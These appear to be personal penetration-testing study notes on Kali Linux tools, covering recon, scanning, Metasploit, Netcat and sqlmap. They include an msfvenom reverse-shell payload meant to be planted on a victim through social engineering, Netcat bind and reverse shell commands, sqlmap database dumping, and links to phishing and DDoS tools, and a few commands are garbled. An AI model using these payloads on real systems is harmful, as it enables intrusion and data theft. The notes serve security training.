TOOLS

Kali linux

DEPENDENCIES

DOCKER

Docker is used for running containers. Image file comes with all dependencies installed,
so no errors while running a specific tool.

Installation:

● sudo apt update

● sudo apt upgrade
● sudo apt install apt-transport-https ca-certificates curl
software-properties-common
● curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o
/usr/share/keyrings/docker-archive-keyring.gpg
● sudo apt install -y docker.io
● sudo systemctl status docker
● sudo systemctl enable docker --now
● /* sudo usermod -aG docker $USER
● printf '%s\n' "deb https://download.docker.com/linux/debian bullseye stable" |
● sudo tee /etc/apt/sources.list.d/docker-ce.list
● curl -fsSL https://download.docker.com/linux/debian/gpg |
● sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/docker-ce-archive-keyring.gpg */
● sudo apt update
● sudo apt install -y docker-ce docker-ce-cli containerd.io
● sudo systemctl start docker
● sudo systemctl enable docker
● sudo docker --version

0
If you want to use docker next time, first START and ENABLE docker.

METASPLOITABLE

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to

conduct security training, test security tools, and practice common penetration testing
techniques.

Installation:

● Now, we are going to install this vulnerable machine in DOCKER.

● First start the docker and pull the container - sudo docker pull
icarossio/metasploitable2
● Now run the container - docker run -ditP icarossio/metasploitable2
● After running this container, you'll get container id like this =
dee0952648eec8dc51aa9d45c6c0317b84c4ef6c88e50af7e86c834eb5556598
● Now execute this container - docker exec -it < container id > /bin/bash
● That's it! Metasploitable machines start…

RECONNAISSANCE
1
 ★ NS LOOKUP
★ Sudomy ( subdomain finder )
★ Cupp
★ Httpx
★ Bhedak
★ 403 bypasser
★ uncover
★ https://github.com/mishakorzik/Free-Proxy
★ https://github.com/mishakorzik/UserFinder
★ Host
★ Dig
★ WHOIS
★ FOCA
★ ExifTool
★ theHarvester
★ shodan
★ Maltego
★ recon-ng
★ censys
★ Netcat
★ dnsrecon
★ Sublist3r

DNS ANALYSIS

DNS Analysis is mainly done for getting DNS INFRASTRUCTURE details. Based on these
details, you can create a profile of the victim.

DNSRECON

dnsrecon is a powerful tool used for DNS reconnaissance and enumeration. Its primary
purpose is to gather information about DNS (Domain Name System) records associated
with a particular domain. Here's what dnsrecon is typically used for:

Discovering DNS Records: It scans and enumerates different types of DNS records

2
associated with a domain, such as SOA, NS, A, AAAA, MX, TXT, and more.

Identifying Name Servers: Finding the authoritative name servers responsible for a
domain.

Enumerating Mail Exchange Servers: Identifying servers responsible for handling

email for the domain.

Record Types: Obtains various types of DNS records associated with the domain, such as
address records, mail exchange records, name server records, and service records.

● It's installed directly in the kali store.

● Start the tool - dnsrecon -h
● For dns information - dnsrecon -d <h4cker.org>
● Perform zone transfer - dnsrecon -d <h4cker.org> -z

You'll get name server details, ip addresses, mx records.

FIERCE

● Fierce tools are also used for the same purpose. Getting dns information
● Fierce –domain <h4cker.org>
● Along with dns info, you'll get a subdomain list.

DNSENUM

● This tool is also the same as dnsrecon. You'll get associated ip addresses,
subdomains, name servers….
● Dnsenum –enum <h4cker.org>

IDS/IPS & WAF identification

Identify whether a website using load balancers, web application firewalls!

wafw00f

3
Identify and fingerprint web application firewall products.

● Start the tool - wafw00f -h

● Give your target - wafw00f < http://h4cker.org/ >
● You'll get results whether the website uses WAF or any security solution.

SCANNING

NESSUS

Nessus is a platform developed by Tenable that scans for security vulnerabilities in

devices, applications, operating systems, cloud services and other network resources.

Installation

● First go to the browser and download the nessus file manually.

● https://www.tenable.com/downloads/nessus?loginAttempted=true ( or )
● Select DOWNLOAD BY CURL and run that command in the terminal.
● dpkg -i Nessus-10.0.2-ubuntu910_amd64.deb ( replace the file name with current
downloaded version, use LS for filename )
● Start Nessus by typing the following into your terminal
● /bin/systemctl start nessusd.service
● Navigate to https://kali:8843/ in your browser to start Nessus and configure your
scanner.
● Accept risk, continue, select education purpose account and create an account (
use disposable work email )
● Now you'll find the GUI version of NESSUS.
● Wait till the compilation of plugins is completed.
● Start NEW SCAN, set TARGET

4
 ● Wait for the scan to be complete. After checking the scan results.
● Click on REPORT for generating a scan report.

DIRB

Use this tool for scanning the existing directories on the website.

● Open terminal and enter = dirb <url>

● It has one wordlist file, it scans for directories in that website and gives the
existing directories.

NIKTO

For scanning purpose

● Nikto -host <url>

UNISCAN

It is also for scanning with different features.

● Now, just by typing uniscan, we can get the help of uniscan and see all these
options are available;
● h for help, then -u specify the url and -f list of urls, -b uniscan to go to background
● -q enable directory checks, -w check file, -e enable robots.txt file and sitemap.xml
file check, -t enable dynamic check, -s enable static check, -r enable stress check, -i
it search in Bing, -o search in Google, -g find out the web fingerprint, -j server
fingerprint.
● uniscan -u testphp.vulnweb.com -qwodsrgj

WIRELESS HACKING

SOCIAL ENGINEERING

5
PASSWORD CRACKING

EXPLOITATION
● Xsser
● Armitage ( metasploit gui version )

Creating backdoors/shells

METASPLOIT

Metasploit is one of the most powerful and widely used tools for penetration testing.

Installation

● Run the tool from applications. It is pre-installed.

Basic usage

● Start the tool by msfconsole

● Now you are in metasploit console window
● Metasploit works with modules. It has 7 modules. Auxiliary, encoder, evasion,
exploit, nop, payload, post. Refer https://docs.metasploit.com/docs/modules.html
● Search these modules - search <module name> for ex. Search exploit

6
 ● Interact with a module by name or index. For example info 1232, use 1232 or use
auxiliary/dos/http/ws_dos
● Now see options for that module and make settings - show options
● Depending on the options, set hosts and ports - set rhosts <victim ip address>, set
rport <victim ip address>
● Now deliver the exploit to the victim - exploit

Setting module options

● Each Metasploit module has a set of options which must be set before running.
These can be seen with the show options or options command
● Each Metasploit module also has advanced options, which can often be useful for
fine-tuning modules
● You can see which options still options to be set with the show missing command

Creating payload

● For creating payloads, we use msfvenom.

● Msfvenom -p windows/meterpreter_reverse_http LHOST=<IP> LPORT=4444 -f exe
> payload.exe
● Payload will successfully create and show the path where it saves.
● Upload the payload app to the VIRUSTOTAL website to check whether it is detected
by any anti-virus or not!
● Now by using social engineering techniques, install that payload in the victim
device.
● Then connect to that payload with msfconsole. For that, start a multi handler.
● Use exploit/multi/handler
● set payload windows/x64/meterpreter/reverse_tcp
● Now send exploit to background = Exploit -j -z
● Open the app in the victim machine, now you'll get access.
● Type sessions for checking your sessions. Use that session by sessions -i <session
number>
● https://nptel.ac.in/courses/106105217

NETCAT

7
Here, we are using NETCAT for creating BIND & REVERSE shells.

BIND SHELL:

● With a bind shell, an attacker opens a port or a listener on the compromised

system and waits for a connection. This is done in order to connect to the victim
from any system and execute commands and further manipulate the victim.
● Start listener in victim machine. Enter this command in victim machine - nc -lvp
1234 -e /bin/bash
● Now connect to that listener from the attacker machine. Type this command in
your machine - nc -nv <victim ip> 1234
● That's it, backdoor created, now you can view files of the victim machine. Type ls
to view.

REVERSE SHELL:

A reverse shell is a vulnerability in which an attacking system has a listener (port open),
and the victim initiates a connection back to the attacking system.

One of the challenges of using bind shells is that if the victim’s system is behind a
firewall, the listening port might be blocked. However, if the victim’s system can
initiate a connection to the attacking system on a given port, a reverse shell can be
used to overcome this challenge.

● Now create a reverse shell. Type this command in attacker machine -nc -lvp 666
● Now connect to that listener, type this command in attacker system - nc < attacker
ip > 666 -e /bin/bash
● Now view files and execute commands.

SQLMAP

SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection.

● observe a web url that is of the form

http://testphp.vulnweb.com/listproducts.php?cat=1
● where the ‘GET’ parameter is in green color, then the website may be vulnerable

8
 to this mode of SQL injection, and an attacker may be able to gain access to
information in the database. Furthermore, SQLMAP works when it is php based.
● Install sql map - sudo apt-get install sqlmap
● Check for help - sqlmap -h
● For sqlmap to work, you should give a URL with input query parameters.
● First, you should know the information about existing database - sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

–dbs - collecting info about database

-u - for taking url

● For perfect results

1. GET parameter should be stable

2. If the GET parameter is dynamic, you'll be asked for a HEURISTIC TEST, go with
that!

● List information about Tables present in a particular Database - sqlmap -u

http://testphp.vulnweb.com/listproducts.php?cat=1 -D <database name> --tables
● List information about the columns of a particular table - sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1 -D < database name> -T <table
name> --columns
● Dump the data from the columns - sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1 -D < database name> -T <table
name> -C <column name> --dump
● SQL injection can be generally prevented by using Prepared Statements . For
prepared statements, we basically send the sql query with a placeholder for the
user input and then send the actual user input as a separate command.

9
POST-EXPLOITATION

REVERSE ENGINEERING

INTRUSION DETECTION SYSTEMS

REPORTING

MISCELLANEOUS

10
 ★ Maxphisher https://github.com/KasRoudra/MaxPhisher
★ Hacking toolkit https://github.com/CodingRanjith/hackingtoolkit
★ Evil limiter https://github.com/bitbrute/evillimiter
★ Iky https://github.com/kennbroorg/iKy
★ Cupp https://github.com/Mebus/cupp
★ DDoS attack
★ GITTOOL
★ Xerosploit
★ Rapidscan
★ Seeker
(https://medium.com/@aalam-info-solutions-llp/get-someones-location-by-using-se
eker-3160b8887e5)
★ Subjack, subfinder
★ https://github.com/kancotdiq/wpaf

Hacking with PDF

https://0xcybery.github.io/blog/hacking-with-pdf

11